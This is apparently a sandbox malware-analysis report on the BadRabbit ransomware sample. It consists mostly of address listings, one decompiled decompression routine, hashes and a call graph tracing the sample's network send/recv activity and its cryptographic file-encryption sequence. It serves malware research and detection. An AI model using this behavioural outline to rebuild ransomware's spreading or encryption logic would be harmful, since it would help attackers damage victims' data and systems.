                                                                                                                                                                                        0x01322460
                                                                                                                                                                                        0x01322461
                                                                                                                                                                                        0x01322464
                                                                                                                                                                                        0x01322467
                                                                                                                                                                                        0x01322468
                                                                                                                                                                                        0x0132246b
                                                                                                                                                                                        0x0132246e
                                                                                                                                                                                        0x01322470
                                                                                                                                                                                        0x01322473
                                                                                                                                                                                        0x01322476
                                                                                                                                                                                        0x01322479
                                                                                                                                                                                        0x0132247c
                                                                                                                                                                                        0x01322482
                                                                                                                                                                                        0x01322482
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322619
                                                                                                                                                                                        0x01322619
                                                                                                                                                                                        0x0132261c
                                                                                                                                                                                        0x0132261e
                                                                                                                                                                                        0x0132266d
                                                                                                                                                                                        0x0132266d
                                                                                                                                                                                        0x01322670
                                                                                                                                                                                        0x01322676
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322676
                                                                                                                                                                                        0x01322620
                                                                                                                                                                                        0x01322620
                                                                                                                                                                                        0x01322622
                                                                                                                                                                                        0x01322650
                                                                                                                                                                                        0x01322650
                                                                                                                                                                                        0x01322652
                                                                                                                                                                                        0x01322654
                                                                                                                                                                                        0x01322655
                                                                                                                                                                                        0x01322659
                                                                                                                                                                                        0x0132265a
                                                                                                                                                                                        0x0132265d
                                                                                                                                                                                        0x0132265f
                                                                                                                                                                                        0x01322661
                                                                                                                                                                                        0x01322664
                                                                                                                                                                                        0x01322664
                                                                                                                                                                                        0x01322664
                                                                                                                                                                                        0x0132266a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132266a
                                                                                                                                                                                        0x01322624
                                                                                                                                                                                        0x01322624
                                                                                                                                                                                        0x01322627
                                                                                                                                                                                        0x01322627
                                                                                                                                                                                        0x01322627
                                                                                                                                                                                        0x01322629
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132262f
                                                                                                                                                                                        0x0132262f
                                                                                                                                                                                        0x01322633
                                                                                                                                                                                        0x01322636
                                                                                                                                                                                        0x01322638
                                                                                                                                                                                        0x0132263a
                                                                                                                                                                                        0x0132263d
                                                                                                                                                                                        0x01322640
                                                                                                                                                                                        0x01322642
                                                                                                                                                                                        0x01322645
                                                                                                                                                                                        0x01322646
                                                                                                                                                                                        0x01322649
                                                                                                                                                                                        0x0132264c
                                                                                                                                                                                        0x0132264e
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132264e
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0132267c
                                                                                                                                                                                        0x0132267c
                                                                                                                                                                                        0x0132267f
                                                                                                                                                                                        0x01322681
                                                                                                                                                                                        0x01322685
                                                                                                                                                                                        0x01322687
                                                                                                                                                                                        0x01322688
                                                                                                                                                                                        0x0132268b
                                                                                                                                                                                        0x0132268d
                                                                                                                                                                                        0x01322692
                                                                                                                                                                                        0x01322695
                                                                                                                                                                                        0x01322698
                                                                                                                                                                                        0x0132269a
                                                                                                                                                                                        0x013226e4
                                                                                                                                                                                        0x013226e4
                                                                                                                                                                                        0x013226e6
                                                                                                                                                                                        0x01322795
                                                                                                                                                                                        0x01322795
                                                                                                                                                                                        0x0132279a
                                                                                                                                                                                        0x0132279d
                                                                                                                                                                                        0x013227a0
                                                                                                                                                                                        0x013227a6
                                                                                                                                                                                        0x013227a8
                                                                                                                                                                                        0x013227aa
                                                                                                                                                                                        0x013227ad
                                                                                                                                                                                        0x013227b0
                                                                                                                                                                                        0x013227b2
                                                                                                                                                                                        0x013227c0
                                                                                                                                                                                        0x013227c0
                                                                                                                                                                                        0x013227c2
                                                                                                                                                                                        0x013227c8
                                                                                                                                                                                        0x013227cb
                                                                                                                                                                                        0x013227ce
                                                                                                                                                                                        0x013227ce
                                                                                                                                                                                        0x013227d1
                                                                                                                                                                                        0x013227d4
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013227d4
                                                                                                                                                                                        0x013227b4
                                                                                                                                                                                        0x013227b4
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013227b4
                                                                                                                                                                                        0x013226ec
                                                                                                                                                                                        0x013226ec
                                                                                                                                                                                        0x013226ee
                                                                                                                                                                                        0x013226f1
                                                                                                                                                                                        0x013226f3
                                                                                                                                                                                        0x01322895
                                                                                                                                                                                        0x01322898
                                                                                                                                                                                        0x0132289a
                                                                                                                                                                                        0x0132289d
                                                                                                                                                                                        0x0132289f
                                                                                                                                                                                        0x013228a1
                                                                                                                                                                                        0x013228a4
                                                                                                                                                                                        0x013228a7
                                                                                                                                                                                        0x013228aa
                                                                                                                                                                                        0x013228ad
                                                                                                                                                                                        0x013228ad
                                                                                                                                                                                        0x013228af
                                                                                                                                                                                        0x013228af
                                                                                                                                                                                        0x013228af
                                                                                                                                                                                        0x013228b2
                                                                                                                                                                                        0x013228b4
                                                                                                                                                                                        0x013228b5
                                                                                                                                                                                        0x013228b5
                                                                                                                                                                                        0x013228b5
                                                                                                                                                                                        0x013228b8
                                                                                                                                                                                        0x013228bb
                                                                                                                                                                                        0x013228be
                                                                                                                                                                                        0x013228c1
                                                                                                                                                                                        0x013228c4
                                                                                                                                                                                        0x013228ca
                                                                                                                                                                                        0x013228ca
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013228c4
                                                                                                                                                                                        0x01322849
                                                                                                                                                                                        0x01322849
                                                                                                                                                                                        0x0132284b
                                                                                                                                                                                        0x0132284e
                                                                                                                                                                                        0x01322865
                                                                                                                                                                                        0x01322865
                                                                                                                                                                                        0x01322868
                                                                                                                                                                                        0x0132286b
                                                                                                                                                                                        0x01322877
                                                                                                                                                                                        0x01322879
                                                                                                                                                                                        0x01322879
                                                                                                                                                                                        0x0132286d
                                                                                                                                                                                        0x0132286d
                                                                                                                                                                                        0x01322870
                                                                                                                                                                                        0x01322873
                                                                                                                                                                                        0x01322873
                                                                                                                                                                                        0x0132287c
                                                                                                                                                                                        0x0132287f
                                                                                                                                                                                        0x01322882
                                                                                                                                                                                        0x01322884
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322886
                                                                                                                                                                                        0x01322886
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322886
                                                                                                                                                                                        0x01322884
                                                                                                                                                                                        0x01322850
                                                                                                                                                                                        0x01322850
                                                                                                                                                                                        0x01322857
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322859
                                                                                                                                                                                        0x01322859
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013228d5
                                                                                                                                                                                        0x013228d5
                                                                                                                                                                                        0x013228d9
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013228df
                                                                                                                                                                                        0x013228df
                                                                                                                                                                                        0x013228e2
                                                                                                                                                                                        0x013228e5
                                                                                                                                                                                        0x013228e8
                                                                                                                                                                                        0x013228eb
                                                                                                                                                                                        0x013228ed
                                                                                                                                                                                        0x013228f0
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013228fb
                                                                                                                                                                                        0x013228fb
                                                                                                                                                                                        0x013228ff
                                                                                                                                                                                        0x01322900
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013229c8
                                                                                                                                                                                        0x013229c8
                                                                                                                                                                                        0x013229ca
                                                                                                                                                                                        0x013229cd
                                                                                                                                                                                        0x01322a3e
                                                                                                                                                                                        0x01322a3e
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322a3e
                                                                                                                                                                                        0x013229cf
                                                                                                                                                                                        0x013229cf
                                                                                                                                                                                        0x013229d2
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013229d4
                                                                                                                                                                                        0x013229d4
                                                                                                                                                                                        0x013229d7
                                                                                                                                                                                        0x01322a07
                                                                                                                                                                                        0x01322a07
                                                                                                                                                                                        0x01322a0a
                                                                                                                                                                                        0x01322a39
                                                                                                                                                                                        0x01322a39
                                                                                                                                                                                        0x01322a3c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322a3c
                                                                                                                                                                                        0x01322a0c
                                                                                                                                                                                        0x01322a0c
                                                                                                                                                                                        0x01321899
                                                                                                                                                                                        0x01321899
                                                                                                                                                                                        0x01321dc2
                                                                                                                                                                                        0x01321dc2
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01321dc2
                                                                                                                                                                                        0x013229d9
                                                                                                                                                                                        0x013229d9
                                                                                                                                                                                        0x013229dc
                                                                                                                                                                                        0x013229dc
                                                                                                                                                                                        0x013229dc
                                                                                                                                                                                        0x013229de
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x013229e0
                                                                                                                                                                                        0x013229e0
                                                                                                                                                                                        0x013229e4
                                                                                                                                                                                        0x013229e7
                                                                                                                                                                                        0x013229e9
                                                                                                                                                                                        0x013229eb
                                                                                                                                                                                        0x013229ee
                                                                                                                                                                                        0x013229f1
                                                                                                                                                                                        0x013229f3
                                                                                                                                                                                        0x013229f6
                                                                                                                                                                                        0x013229f7
                                                                                                                                                                                        0x013229fa
                                                                                                                                                                                        0x013229fd
                                                                                                                                                                                        0x01322a00
                                                                                                                                                                                        0x01322a03
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322a05
                                                                                                                                                                                        0x01322a05
                                                                                                                                                                                        0x01322a05

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
                                                                                                                                                                                        • Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                                        • String ID: Oet$8 Oet$8 Oet$invalid stored block lengths
                                                                                                                                                                                        • API String ID: 3510742995-3427597846
                                                                                                                                                                                        • Opcode ID: e944a7336d4932b8a833548fc6629c73494809404ad5ac904f20951767874b45
                                                                                                                                                                                        • Instruction ID: 29234c2a407977cebf29b905a3b40dde0d017404ca4f341d28a4feb5fccfd2b5
                                                                                                                                                                                        • Opcode Fuzzy Hash: e944a7336d4932b8a833548fc6629c73494809404ad5ac904f20951767874b45
                                                                                                                                                                                        • Instruction Fuzzy Hash: FA415A71E00229DFDF28DF69C9805AEBBF1FF98314B14856AD855D7644EB309A80CF40
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 842 1322dcb-1322ddf 843 1322e01-1322e04 842->843 844 1322de1-1322df8 842->844 845 1322e06-1322e11 843->845 846 1322e14-1322e1f 843->846 844->843 850 1322dfa-1322dfc 844->850 845->846 848 1322e21-1322e30 memcpy 846->848 849 1322e39-1322e56 memcpy 846->849 851 1322e34-1322e37 848->851 852 1322e58-1322e6d memcpy 849->852 853 1322e6f-1322e78 849->853 854 1322e8c-1322e90 850->854 855 1322e87 851->855 852->851 856 1322e7a 853->856 857 1322e7e-1322e83 853->857 859 1322e8a 855->859 856->857 858 1322e85 857->858 857->859 858->855 859->854
                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E01322DCB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                        				int _t41;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                                        				int _t60;
                                                                                                                                                                                        				int _t62;
                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t57 = _a4;
                                                                                                                                                                                        				_t64 =  *((intOrPtr*)(_t57 + 0x1c));
                                                                                                                                                                                        				if( *(_t64 + 0x34) != 0) {
                                                                                                                                                                                        					L3:
                                                                                                                                                                                        					if( *(_t64 + 0x28) == 0) {
                                                                                                                                                                                        						 *(_t64 + 0x28) = 1 <<  *(_t64 + 0x24);
                                                                                                                                                                                        						 *(_t64 + 0x30) = 0;
                                                                                                                                                                                        						 *(_t64 + 0x2c) = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t60 =  *(_t64 + 0x28);
                                                                                                                                                                                        					_t52 = _a12;
                                                                                                                                                                                        					_t34 = _a8;
                                                                                                                                                                                        					if(_t52 < _t60) {
                                                                                                                                                                                        						_t62 =  >  ? _t52 : _t60 -  *(_t64 + 0x30);
                                                                                                                                                                                        						memcpy( *(_t64 + 0x34) +  *(_t64 + 0x30), _t34 - _t52, _t62);
                                                                                                                                                                                        						_t53 = _t52 - _t62;
                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                        							 *(_t64 + 0x30) =  *(_t64 + 0x30) + _t62;
                                                                                                                                                                                        							_t54 =  *(_t64 + 0x28);
                                                                                                                                                                                        							if( *(_t64 + 0x30) == _t54) {
                                                                                                                                                                                        								 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t39 =  *(_t64 + 0x2c);
                                                                                                                                                                                        							if(_t39 >= _t54) {
                                                                                                                                                                                        								goto L15;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t41 = _t39 + _t62;
                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						memcpy( *(_t64 + 0x34), _a8 - _t53, _t53);
                                                                                                                                                                                        						 *(_t64 + 0x30) = _t53;
                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						memcpy( *(_t64 + 0x34), _t34 - _t60, _t60);
                                                                                                                                                                                        						 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                                                                                                        						L7:
                                                                                                                                                                                        						_t41 =  *(_t64 + 0x28);
                                                                                                                                                                                        						L14:
                                                                                                                                                                                        						 *(_t64 + 0x2c) = _t41;
                                                                                                                                                                                        						L15:
                                                                                                                                                                                        						return 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t49 =  *((intOrPtr*)(_t57 + 0x20))( *((intOrPtr*)(_t57 + 0x28)), 1 <<  *(_t64 + 0x24), 1);
                                                                                                                                                                                        				_t65 = _t65 + 0xc;
                                                                                                                                                                                        				 *(_t64 + 0x34) = 1;
                                                                                                                                                                                        				if(_t49 != 0) {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 1;
                                                                                                                                                                                        			}















                                                                                                                                                                                        0x01322e30
                                                                                                                                                                                        0x01322e34
                                                                                                                                                                                        0x01322e34
                                                                                                                                                                                        0x01322e87
                                                                                                                                                                                        0x01322e87
                                                                                                                                                                                        0x01322e8a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01322e8a
                                                                                                                                                                                        0x01322e1f
                                                                                                                                                                                        0x01322ded
                                                                                                                                                                                        0x01322df0
                                                                                                                                                                                        0x01322df3
                                                                                                                                                                                        0x01322df8
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
• Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
Similarity
• API ID: memcpy
• String ID: 8 Oet
• API String ID: 3510742995-3278195550
• Opcode ID: 44921833c22fa8d99f2d9e117e90f1afde499ff961fd9a67a9b6ee16f76bb84c
• Instruction ID: b678973a2bcac7f3cc519d683780e40b7694a2002983470851d366e0cc47d9d7
• Opcode Fuzzy Hash: 44921833c22fa8d99f2d9e117e90f1afde499ff961fd9a67a9b6ee16f76bb84c
• Instruction Fuzzy Hash: 3B216DB2610B159FC760AF29DE80963F7EAFF986187441A2DE88A87E10D331F844CF50
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 21.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 26.7%
Total number of Nodes: 1348
Total number of Limit Nodes: 35
5764 7b2694 recv 5764->5765 5764->5766 5765->5764 5765->5766 5766->5580 5768 7b2e48 GetProcessHeap HeapAlloc 5767->5768 5773 7b2f2a 5767->5773 5769 7b2e5c htons 5768->5769 5768->5773 5772 7b2ed3 5769->5772 5770 7b2ee7 send 5771 7b2efd recv 5770->5771 5770->5772 5771->5772 5772->5770 5772->5773 5773->5586 5775 7b29d5 GetProcessHeap HeapAlloc 5774->5775 5795 7b2d8c 5774->5795 5776 7b29eb rand htons 5775->5776 5775->5795 5777 7b2a7e rand 5776->5777 5777->5777 5778 7b2a8d 5777->5778 5779 7b2a91 rand send 5778->5779 5781 7b2ae5 rand htons 5778->5781 5779->5778 5780 7b2ac5 recv 5779->5780 5780->5778 5780->5781 5782 7b2b70 HeapAlloc 5781->5782 5783 7b2b82 htons 5782->5783 5782->5795 5784 7b2bbe rand 5783->5784 5784->5784 5785 7b2bce HeapAlloc 5784->5785 5787 7b2bec htons 5785->5787 5785->5795 5788 7b2c5e HeapAlloc 5787->5788 5789 7b2c72 memcpy memcpy htons 5788->5789 5788->5795 5790 7b2d0c memcpy 5789->5790 5790->5790 5791 7b2d25 send 5790->5791 5792 7b2d3d send 5791->5792 5791->5795 5793 7b2d55 5792->5793 5792->5795 5794 7b2d83 recv 5793->5794 5793->5795 5794->5793 5794->5795 5795->5590 5797 7b3194 HeapAlloc 5796->5797 5798 7b31a2 rand 5797->5798 5802 7b31e5 5797->5802 5799 7b31bd rand 5798->5799 5799->5799 5800 7b31ca 5799->5800 5887 7b2f5a GetProcessHeap HeapAlloc 5800->5887 5802->5581 5802->5591 5804 7b3226 HeapAlloc 5803->5804 5805 7b3233 htons memcpy send 5804->5805 5806 7b3293 5804->5806 5805->5806 5806->5607 5808 7b32e1 GetProcessHeap HeapAlloc 5807->5808 5811 7b3372 GetProcessHeap 5807->5811 5809 7b32fe htons memcpy send 5808->5809 5808->5811 5810 7b335a recv 5809->5810 5809->5811 5810->5811 5811->5607 5813 7b33c1 HeapAlloc 5812->5813 5814 7b33ce htons memcpy send 5813->5814 5815 7b342d 5813->5815 5814->5815 5815->5607 5817 7b36ad GetProcessHeap HeapAlloc 5816->5817 5818 7b3d03 5816->5818 5819 7b36c0 GetProcessHeap HeapAlloc 5817->5819 5820 7b3cf7 GetProcessHeap 5817->5820 5818->5610 5865 7b41e9 5818->5865 5821 7b36dc 5819->5821 5854 7b3b22 5819->5854 5820->5818 
5822 7b3b39 5821->5822 5823 7b36e8 5821->5823 5826 7b3209 4 API calls 5822->5826 5824 7b33a4 4 API calls 5823->5824 5825 7b3745 5824->5825 5828 7b3787 5825->5828 5831 7b33a4 4 API calls 5825->5831 5825->5854 5827 7b3baa 5826->5827 5830 7b3bb2 Sleep 5827->5830 5827->5854 5829 7b379d Sleep 5828->5829 5828->5854 5832 7b3209 4 API calls 5829->5832 5833 7b3bca 5830->5833 5831->5828 5834 7b3806 5832->5834 5835 7b3209 4 API calls 5833->5835 5836 7b3876 5834->5836 5838 7b3209 4 API calls 5834->5838 5834->5854 5837 7b3c5b 5835->5837 5840 7b3888 Sleep 5836->5840 5836->5854 5839 7b3c5f Sleep rand 5837->5839 5837->5854 5841 7b3841 5838->5841 5842 7b3209 4 API calls 5839->5842 5843 7b33a4 4 API calls 5840->5843 5841->5836 5846 7b33a4 4 API calls 5841->5846 5844 7b3cbe 5842->5844 5845 7b38d2 5843->5845 5847 7b3cc2 Sleep 5844->5847 5844->5854 5848 7b33a4 4 API calls 5845->5848 5845->5854 5846->5836 5847->5854 5849 7b392c 5848->5849 5850 7b3941 HeapAlloc 5849->5850 5849->5854 5851 7b3953 memset 5850->5851 5850->5854 5852 7b3209 4 API calls 5851->5852 5853 7b3978 5852->5853 5853->5854 5855 7b3980 recv 5853->5855 5854->5820 5855->5854 5856 7b399b 5855->5856 5856->5854 5857 7b39a8 htons 5856->5857 5857->5854 5858 7b39c1 5857->5858 5858->5854 5859 7b3209 4 API calls 5858->5859 5860 7b3a88 5859->5860 5860->5854 5861 7b3a90 Sleep rand 5860->5861 5862 7b33a4 4 API calls 5861->5862 5863 7b3b0f 5862->5863 5863->5854 5864 7b3b13 Sleep 5863->5864 5864->5854 5866 7b4203 HeapAlloc 5865->5866 5867 7b4217 5866->5867 5886 7b465e 5866->5886 5892 7b40e3 GetProcessHeap HeapAlloc 5867->5892 5872 7b4683 5874 7b40e3 12 API calls 5872->5874 5873 7b42a0 5875 7b3d0d 32 API calls 5873->5875 5877 7b42c7 5873->5877 5874->5886 5875->5877 5876 7b3d0d 32 API calls 5878 7b431d 5876->5878 5877->5876 5877->5886 5879 7b3d0d 32 API calls 5878->5879 5878->5886 5880 7b436e 5879->5880 5881 7b43a6 memset 5880->5881 5880->5886 5882 7b43c1 5881->5882 5881->5886 5883 7b40e3 12 API calls 5882->5883 5884 7b4641 5883->5884 
5885 7b40e3 12 API calls 5884->5885 5884->5886 5885->5886 5886->5610 5888 7b2f89 GetProcessHeap HeapAlloc 5887->5888 5891 7b303c 5887->5891 5889 7b2fa6 htons memcpy send 5888->5889 5888->5891 5890 7b3025 recv 5889->5890 5889->5891 5890->5891 5891->5802 5893 7b410b GetProcessHeap HeapAlloc 5892->5893 5894 7b41e0 5892->5894 5896 7b4158 5893->5896 5897 7b41d4 GetProcessHeap 5893->5897 5894->5886 5905 7b3d0d GetProcessHeap HeapAlloc 5894->5905 5898 7b3209 4 API calls 5896->5898 5897->5894 5899 7b417b 5898->5899 5900 7b417f Sleep 5899->5900 5901 7b41c6 GetProcessHeap 5899->5901 5902 7b3209 4 API calls 5900->5902 5901->5897 5903 7b41b3 5902->5903 5903->5901 5904 7b41b7 Sleep 5903->5904 5904->5901 5906 7b40d9 5905->5906 5907 7b3d41 GetProcessHeap HeapAlloc 5905->5907 5906->5872 5906->5873 5906->5886 5908 7b40cb GetProcessHeap 5907->5908 5909 7b3d55 GetProcessHeap HeapAlloc 5907->5909 5908->5906 5910 7b40bf GetProcessHeap 5909->5910 5911 7b3d72 5909->5911 5910->5908 5912 7b3209 4 API calls 5911->5912 5913 7b3e4e 5912->5913 5914 7b40b3 GetProcessHeap 5913->5914 5915 7b3e56 Sleep GetProcessHeap HeapAlloc 5913->5915 5914->5910 5915->5914 5916 7b3e79 rand 5915->5916 5917 7b32af 8 API calls 5916->5917 5918 7b3ef0 5917->5918 5919 7b409b 5918->5919 5920 7b3ef8 memset 5918->5920 5919->5914 5921 7b3209 4 API calls 5920->5921 5922 7b3f22 5921->5922 5922->5919 5923 7b3f2a recv 5922->5923 5923->5919 5924 7b3f46 5923->5924 5924->5919 5925 7b3f50 htons 5924->5925 5925->5919 5926 7b3f73 5925->5926 5927 7b3209 4 API calls 5926->5927 5928 7b3feb 5927->5928 5928->5919 5929 7b3ff3 Sleep 5928->5929 5930 7b3209 4 API calls 5929->5930 5931 7b405a 5930->5931 5931->5919 5932 7b405e Sleep 5931->5932 5933 7b4074 HeapAlloc 5932->5933 5933->5919 5934 7b4084 memcpy 5933->5934 5934->5919 5936 7b4f38 5935->5936 5937 7b4e89 5935->5937 5936->5661 5936->5666 5937->5937 5938 7b2f5a 8 API calls 5937->5938 5939 7b4ee8 5938->5939 5940 7b4f2f GetProcessHeap HeapFree 5939->5940 5974 7b3071 GetProcessHeap 
HeapAlloc 5939->5974 5940->5936 5943 7b4f27 GetProcessHeap HeapFree 5943->5940 5945 7b4f5c HeapAlloc 5944->5945 5946 7b4f6f rand 5945->5946 5951 7b4fcb 5945->5951 5948 7b2f5a 8 API calls 5946->5948 5949 7b4fad 5948->5949 5950 7b3071 9 API calls 5949->5950 5949->5951 5950->5951 5951->5670 5951->5671 5953 7b4b77 HeapAlloc 5952->5953 5955 7b4c2e rand 5953->5955 5957 7b4cff 5953->5957 5955->5957 5957->5678 5958 7b501e 5957->5958 5959 7b2f5a 8 API calls 5958->5959 5960 7b5040 5959->5960 5961 7b3071 9 API calls 5960->5961 5962 7b5060 5960->5962 5961->5962 5962->5678 5963 7b50a2 5962->5963 5964 7b50b9 HeapAlloc 5963->5964 5965 7b50ca 5964->5965 5966 7b5162 5964->5966 5967 7b2f5a 8 API calls 5965->5967 5966->5678 5968 7b5117 5967->5968 5969 7b5155 HeapFree 5968->5969 5970 7b3071 9 API calls 5968->5970 5969->5966 5972 7b513f 5970->5972 5972->5969 5973 7b514e HeapFree 5972->5973 5973->5969 5975 7b309f GetProcessHeap HeapAlloc 5974->5975 5977 7b3150 5974->5977 5976 7b30b3 htons send 5975->5976 5975->5977 5976->5977 5978 7b3101 recv 5976->5978 5977->5940 5977->5943 5978->5977 5979 7b311c 5978->5979 5979->5977 5980 7b312d HeapAlloc 5979->5980 5980->5977 5981 7b313f memcpy 5980->5981 5981->5977 5983 7b6e29 EnterCriticalSection 5982->5983 5984 7b6b90 5982->5984 5985 7b6e39 5983->5985 5984->5466 5989 7b6da4 5985->5989 5990 7b6e13 LeaveCriticalSection 5989->5990 5991 7b6db3 EnterCriticalSection 5989->5991 5990->5984 5992 7b6e0b LeaveCriticalSection 5991->5992 5993 7b6dc6 5991->5993 5992->5990 5994 7b6df1 5993->5994 5996 7b6aa8 5993->5996 5994->5992 5997 7b6aca 5996->5997 5998 7b6ab1 5996->5998 5997->5993 5998->5997 5999 7b6ab7 StrCmpIW 5998->5999 5999->5997 6001 7b62b9 6000->6001 6002 7b634f LocalFree 6000->6002 6021 7b5507 CryptAcquireContextW 6001->6021 6006 7b6345 CloseHandle 6006->6002 6009 7b633c CryptReleaseContext 6009->6006 6012 7b6333 CryptDestroyKey 6012->6009 6015 7b632a CryptDestroyKey 6015->6012 6016 7b62ed CreateThread 6045 7b5e9f 6016->6045 6122 7b60f9 6016->6122 
6019 7b631f CryptDestroyHash 6019->6015 6020 7b630f WaitForSingleObject CloseHandle 6020->6019 6022 7b5528 GetLastError 6021->6022 6023 7b5542 6021->6023 6022->6023 6024 7b5535 CryptAcquireContextW 6022->6024 6023->6006 6025 7b5613 CryptStringToBinaryW 6023->6025 6024->6023 6026 7b56ce 6025->6026 6027 7b5640 LocalAlloc 6025->6027 6026->6009 6035 7b6085 CryptCreateHash 6026->6035 6027->6026 6028 7b5655 CryptStringToBinaryW 6027->6028 6029 7b5668 CryptDecodeObjectEx 6028->6029 6030 7b56c5 LocalFree 6028->6030 6029->6030 6031 7b5688 LocalAlloc 6029->6031 6030->6026 6031->6030 6032 7b5695 CryptDecodeObjectEx 6031->6032 6033 7b56be LocalFree 6032->6033 6034 7b56ac CryptImportPublicKeyInfo 6032->6034 6033->6030 6034->6033 6036 7b60f1 6035->6036 6037 7b60b0 CryptHashData 6035->6037 6036->6012 6041 7b6246 CryptCreateHash 6036->6041 6037->6036 6038 7b60c4 CryptDeriveKey CryptDestroyHash 6037->6038 6038->6036 6039 7b60ea 6038->6039 6059 7b559b CryptSetKeyParam CryptSetKeyParam CryptGetKeyParam 6039->6059 6042 7b626a CryptHashData 6041->6042 6043 7b6292 6041->6043 6042->6043 6044 7b627d CryptGetHashParam 6042->6044 6043->6015 6043->6016 6044->6043 6046 7b5eb8 PathCombineW 6045->6046 6047 7b607d 6045->6047 6046->6047 6048 7b5ed6 FindFirstFileW 6046->6048 6047->6019 6047->6020 6048->6047 6049 7b5ef6 WaitForMultipleObjects 6048->6049 6050 7b6073 FindClose 6049->6050 6057 7b5f17 6049->6057 6050->6047 6051 7b605c FindNextFileW 6051->6049 6051->6050 6052 7b5fa1 PathCombineW 6052->6051 6052->6057 6053 7b6016 PathFindExtensionW 6053->6057 6054 7b5e9f 36 API calls 6054->6057 6055 7b5fdf StrStrIW 6055->6051 6055->6057 6057->6050 6057->6051 6057->6052 6057->6053 6057->6054 6057->6055 6064 7b5d0a CryptDuplicateKey 6057->6064 6087 7b59b1 6057->6087 6060 7b560c 6059->6060 6061 7b55e4 6059->6061 6060->6036 6061->6060 6062 7b55e9 LocalAlloc 6061->6062 6062->6060 6063 7b55fb CryptSetKeyParam LocalFree 6062->6063 6063->6060 6065 7b5e98 6064->6065 6066 7b5d38 CreateFileW 6064->6066 6065->6051 
